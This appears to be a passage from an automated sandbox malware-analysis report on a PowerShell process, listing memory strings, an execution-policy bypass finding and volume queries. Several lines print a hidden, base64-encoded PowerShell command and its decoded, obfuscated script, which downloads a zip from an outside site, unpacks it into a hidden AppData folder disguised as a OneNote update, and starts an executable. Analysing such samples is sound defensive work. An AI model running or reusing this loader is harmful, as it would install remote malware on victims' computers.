Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj
Encrypted powershell cmdline option found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded .('cd') ${E`NV:ap`p`DAta}; ${L`inK}=("{0}{1}{5}{6}{7}{4}{8}{2}{3}" -f 'ht','tps:','w.','php','rms/','//usherske','nya.co.ke','/fo','vie'); ${Rn`Um}=.("{1}{2}{0}"-f'Random','Ge','t-') -minimum 5 -maximum 9; ${RRn`UM}=.("{1}{2}{0}"-f 'Random','Ge','t-') -minimum 1024 -maximum 9999; ${CH`RS}=("{9}{7}{5}{0}{4}{10}{3}{6}{1}{2}{8}" -f'ps','X','Y','J','tuvwx','no','KLMNOPRSTUVW','m','Z','abcdefghijkl','yzABCDEFGHI'); ${r`StR}=''; ${R`AN}=&("{3}{2}{1}{0}"-f 'ct','e','j','New-Ob') ("{0}{2}{1}{3}"-f 'Sy','em.Rando','st','m'); for (${I}=0; ${I} -lt ${r`NUm}; ${i}++) {${rS`Tr}+=${Ch`RS}[${R`An}.("{1}{0}" -f 't','nex').Invoke(0, ${c`HRS}."L`EnGtH")]}; ${RZ`Ip}=${r`stR}+("{1}{0}"-f'p','.zi'); ${PA`Th}=${en`V`:aPPdata}+'\'+${rZ`ip}; ${P`zIp}=${ENV:a`p`pdatA}+((("{0}{1}{2}" -f'{0}','ONEN0TE','update_')) -f[cHAr]92)+${RRn`Um}; &("{2}{3}{1}{4}{5}{0}" -f 'r','n','Start-B','itsTra','s','fe') -Source ${li`NK} -Destination ${Pa`Th}; .("{0}{1}{3}{2}"-f 'e','xpa','e','nd-archiv') -path ${pa`TH} -destinationpath ${p`zIP}; ${f`Old}=.("{2}{1}{0}" -f'em','t-It','Ge') ${p`zIP} -Force; ${Fo`lD}."atT`RIbu`T`es"=("{1}{0}"-f 'n','Hidde'); .("{0}{1}{2}" -f 'Remo','v','e-Item') -path ${pa`Th}; &('cd') ${p`ZiP}; &("{1}{0}"-f'rt','sta') ("{3}{0}{2}{1}" -f't3','xe','2.e','clien'); ${fS`TR}=${p`ZiP}+((("{3}{2}{1}{0}"-f'32.exe','ient','Ncl','T7')) -CRePLAce ([chAr]84+[chAr]55+[chAr]78),[chAr]92); ${r`Nm}=("{3}{0}{2}{1}{4}" -f 'NEN','Eupdate','0T','O','_')+${r`RN`Um}; &("{0}{1}{4}{3}{2}"-f 'New-Item','Pro','
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded .('cd') ${E`NV:ap`p`DAta}; ${L`inK}=("{0}{1}{5}{6}{7}{4}{8}{2}{3}" -f 'ht','tps:','w.','php','rms/','//usherske','nya.co.ke','/fo','vie'); ${Rn`Um}=.("{1}{2}{0}"-f'Random','Ge','t-') -minimum 5 -maximum 9; ${RRn`UM}=.("{1}{2}{0}"-f 'Random','Ge','t-') -minimum 1024 -maximum 9999; ${CH`RS}=("{9}{7}{5}{0}{4}{10}{3}{6}{1}{2}{8}" -f'ps','X','Y','J','tuvwx','no','KLMNOPRSTUVW','m','Z','abcdefghijkl','yzABCDEFGHI'); ${r`StR}=''; ${R`AN}=&("{3}{2}{1}{0}"-f 'ct','e','j','New-Ob') ("{0}{2}{1}{3}"-f 'Sy','em.Rando','st','m'); for (${I}=0; ${I} -lt ${r`NUm}; ${i}++) {${rS`Tr}+=${Ch`RS}[${R`An}.("{1}{0}" -f 't','nex').Invoke(0, ${c`HRS}."L`EnGtH")]}; ${RZ`Ip}=${r`stR}+("{1}{0}"-f'p','.zi'); ${PA`Th}=${en`V`:aPPdata}+'\'+${rZ`ip}; ${P`zIp}=${ENV:a`p`pdatA}+((("{0}{1}{2}" -f'{0}','ONEN0TE','update_')) -f[cHAr]92)+${RRn`Um}; &("{2}{3}{1}{4}{5}{0}" -f 'r','n','Start-B','itsTra','s','fe') -Source ${li`NK} -Destination ${Pa`Th}; .("{0}{1}{3}{2}"-f 'e','xpa','e','nd-archiv') -path ${pa`TH} -destinationpath ${p`zIP}; ${f`Old}=.("{2}{1}{0}" -f'em','t-It','Ge') ${p`zIP} -Force; ${Fo`lD}."atT`RIbu`T`es"=("{1}{0}"-f 'n','Hidde'); .("{0}{1}{2}" -f 'Remo','v','e-Item') -path ${pa`Th}; &('cd') ${p`ZiP}; &("{1}{0}"-f'rt','sta') ("{3}{0}{2}{1}" -f't3','xe','2.e','clien'); ${fS`TR}=${p`ZiP}+((("{3}{2}{1}{0}"-f'32.exe','ient','Ncl','T7')) -CRePLAce ([chAr]84+[chAr]55+[chAr]78),[chAr]92); ${r`Nm}=("{3}{0}{2}{1}{4}" -f 'NEN','Eupdate','0T','O','_')+${r`RN`Um}; &("{0}{1}{4}{3}{2}"-f 'New-Item','Pro','Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc lgaoaccaywbkaccakqagacqaewbfagaatgbwadoayqbwagaacabgaeqaqqb0ageafqa7acaajab7aewayabpag4aswb9ad0akaaiahsamab9ahsamqb9ahsanqb9ahsangb9ahsanwb9ahsanab9ahsaoab9ahsamgb9ahsamwb9aciaiaatagyaiaanaggadaanacwajwb0ahaacwa6accalaanahcalganacwajwbwaggacaanacwajwbyag0acwavaccalaanac8alwb1ahmaaablahiacwbraguajwasaccabgb5agealgbjag8algbraguajwasaccalwbmag8ajwasaccadgbpaguajwapadsaiaakahsaugbuagaavqbtah0apqauacgaigb7adeafqb7adiafqb7adaafqaiac0azganafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqaewbsafiabgbgafuatqb9ad0algaoaciaewaxah0aewayah0aewawah0aigatagyaiaanafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaamqawadianaagac0abqbhahgaaqbtahuabqagadkaoqa5adkaowagacqaewbdaegayabsafmafqa9acgaigb7adkafqb7adcafqb7aduafqb7adaafqb7adqafqb7adeamab9ahsamwb9ahsangb9ahsamqb9ahsamgb9ahsaoab9aciaiaatagyajwbwahmajwasaccawaanacwajwbzaccalaanaeoajwasaccadab1ahyadwb4accalaanag4abwanacwajwblaewatqboae8auabsafmavabvafyavwanacwajwbtaccalaanafoajwasaccayqbiagmazablagyazwboagkaagbragwajwasaccaeqb6aeeaqgbdaeqarqbgaecasabjaccakqa7acaajab7ahiayabtahqaugb9ad0ajwanadsaiaakahsaugbgaeeatgb9ad0ajgaoaciaewazah0aewayah0aewaxah0aewawah0aigatagyaiaanagmadaanacwajwblaccalaanagoajwasaccatgblahcalqbpagiajwapacaakaaiahsamab9ahsamgb9ahsamqb9ahsamwb9acialqbmacaajwbtahkajwasaccazqbtac4augbhag4azabvaccalaanahmadaanacwajwbtaccakqa7acaazgbvahiaiaaoacqaewbjah0apqawadsaiaakahsasqb9acaalqbsahqaiaakahsacgbgae4avqbtah0aowagacqaewbpah0akwarackaiab7acqaewbyafmayabuahiafqarad0ajab7aemaaabgafiauwb9afsajab7afiayabbag4afqauacgaigb7adeafqb7adaafqaiacaalqbmacaajwb0accalaanag4azqb4accakqauaekabgb2ag8aawblacgamaasacaajab7agmayabiafiauwb9ac4aigbmagaarqbuaecadabiaciakqbdah0aowagacqaewbsafoayabjahaafqa9acqaewbyagaacwb0afiafqaracgaigb7adeafqb7adaafqaiac0azganahaajwasaccalgb6agkajwapadsaiaakahsauabbagaavaboah0apqakahsazqbuagaavgbgadoayqbqafaazabhahqayqb9acsajwbcaccakwakahsacgbaagaaaqbwah0aowagacqaewbqagaaegbjahaafqa9acqaewbfae4avga6ageayabwagaacabkageadabbah0akwaoacgakaaiahsamab9ahsamqb9ahsamgb9aciaiaatagyajwb7adaafqanacwajwbpae4arqboadaavabfaccalaanahuacabkageadablaf8ajwapackaiaatagyawwbjaegaqqbyaf0aoqayackakwakahsaugbsag4ayabvag0afqa7acaajgaoaciaewayah0aewazah0aewaxah0aewa0ah0aewa1ah0aewawah0aigagac0azgagaccacganacwajwbuaccalaanafmadabhahiadaataeiajwasaccaaqb0ahmavabyageajwasaccacwanacwajwbmaguajwapacaalqbtag8adqbyagmazqagacqaewbsagkayaboaesafqagac0arablahmadabpag4ayqb0agkabwbuacaajab7afaayqbgafqaaab9adsaiaauacgaigb7adaafqb7adeafqb7admafqb7adiafqaiac0azgagaccazqanacwajwb4ahaayqanacwajwblaccalaanag4azaatageacgbjaggaaqb2accakqagac0acabhahqaaaagacqaewbwageayabuaegafqagac0azablahmadabpag4ayqb0agkabwbuahaayqb0aggaiaakahsacabgahoasqbqah0aowagacqaewbmagaatwbsagqafqa9ac4akaaiahsamgb9ahsamqb9ahsamab9aciaiaatagyajwblag0ajwasaccadaataekadaanacwajwbhaguajwapacaajab7ahaayab6aekauab9acaalqbgag8acgbj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc lgaoaccaywbkaccakqagacqaewbfagaatgbwadoayqbwagaacabgaeqaqqb0ageafqa7acaajab7aewayabpag4aswb9ad0akaaiahsamab9ahsamqb9ahsanqb9ahsangb9ahsanwb9ahsanab9ahsaoab9ahsamgb9ahsamwb9aciaiaatagyaiaanaggadaanacwajwb0ahaacwa6accalaanahcalganacwajwbwaggacaanacwajwbyag0acwavaccalaanac8alwb1ahmaaablahiacwbraguajwasaccabgb5agealgbjag8algbraguajwasaccalwbmag8ajwasaccadgbpaguajwapadsaiaakahsaugbuagaavqbtah0apqauacgaigb7adeafqb7adiafqb7adaafqaiac0azganafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqaewbsafiabgbgafuatqb9ad0algaoaciaewaxah0aewayah0aewawah0aigatagyaiaanafiayqbuagqabwbtaccalaanaecazqanacwajwb0ac0ajwapacaalqbtagkabgbpag0adqbtacaamqawadianaagac0abqbhahgaaqbtahuabqagadkaoqa5adkaowagacqaewbdaegayabsafmafqa9acgaigb7adkafqb7adcafqb7aduafqb7adaafqb7adqafqb7adeamab9ahsamwb9ahsangb9ahsamqb9ahsamgb9ahsaoab9aciaiaatagyajwbwahmajwasaccawaanacwajwbzaccalaanaeoajwasaccadab1ahyadwb4accalaanag4abwanacwajwblaewatqboae8auabsafmavabvafyavwanacwajwbtaccalaanafoajwasaccayqbiagmazablagyazwboagkaagbragwajwasaccaeqb6aeeaqgbdaeqarqbgaecasabjaccakqa7acaajab7ahiayabtahqaugb9ad0ajwanadsaiaakahsaugbgaeeatgb9ad0ajgaoaciaewazah0aewayah0aewaxah0aewawah0aigatagyaiaanagmadaanacwajwblaccalaanagoajwasaccatgblahcalqbpagiajwapacaakaaiahsamab9ahsamgb9ahsamqb9ahsamwb9acialqbmacaajwbtahkajwasaccazqbtac4augbhag4azabvaccalaanahmadaanacwajwbtaccakqa7acaazgbvahiaiaaoacqaewbjah0apqawadsaiaakahsasqb9acaalqbsahqaiaakahsacgbgae4avqbtah0aowagacqaewbpah0akwarackaiab7acqaewbyafmayabuahiafqarad0ajab7aemaaabgafiauwb9afsajab7afiayabbag4afqauacgaigb7adeafqb7adaafqaiacaalqbmacaajwb0accalaanag4azqb4accakqauaekabgb2ag8aawblacgamaasacaajab7agmayabiafiauwb9ac4aigbmagaarqbuaecadabiaciakqbdah0aowagacqaewbsafoayabjahaafqa9acqaewbyagaacwb0afiafqaracgaigb7adeafqb7adaafqaiac0azganahaajwasaccalgb6agkajwapadsaiaakahsauabbagaavaboah0apqakahsazqbuagaavgbgadoayqbqafaazabhahqayqb9acsajwbcaccakwakahsacgbaagaaaqbwah0aowagacqaewbqagaaegbjahaafqa9acqaewbfae4avga6ageayabwagaacabkageadabbah0akwaoacgakaaiahsamab9ahsamqb9ahsamgb9aciaiaatagyajwb7adaafqanacwajwbpae4arqboadaavabfaccalaanahuacabkageadablaf8ajwapackaiaatagyawwbjaegaqqbyaf0aoqayackakwakahsaugbsag4ayabvag0afqa7acaajgaoaciaewayah0aewazah0aewaxah0aewa0ah0aewa1ah0aewawah0aigagac0azgagaccacganacwajwbuaccalaanafmadabhahiadaataeiajwasaccaaqb0ahmavabyageajwasaccacwanacwajwbmaguajwapacaalqbtag8adqbyagmazqagacqaewbsagkayaboaesafqagac0arablahmadabpag4ayqb0agkabwbuacaajab7afaayqbgafqaaab9adsaiaauacgaigb7adaafqb7adeafqb7admafqb7adiafqaiac0azgagaccazqanacwajwb4ahaayqanacwajwblaccalaanag4azaatageacgbjaggaaqb2accakqagac0acabhahqaaaagacqaewbwageayabuaegafqagac0azablahmadabpag4ayqb0agkabwbuahaayqb0aggaiaakahsacabgahoasqbqah0aowagacqaewbmagaatwbsagqafqa9ac4akaaiahsamgb9ahsamqb9ahsamab9aciaiaatagyajwblag0ajwasaccadaataekadaanacwajwbhaguajwapacaajab7ahaayab6aekauab9acaalqbgag8acgbjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
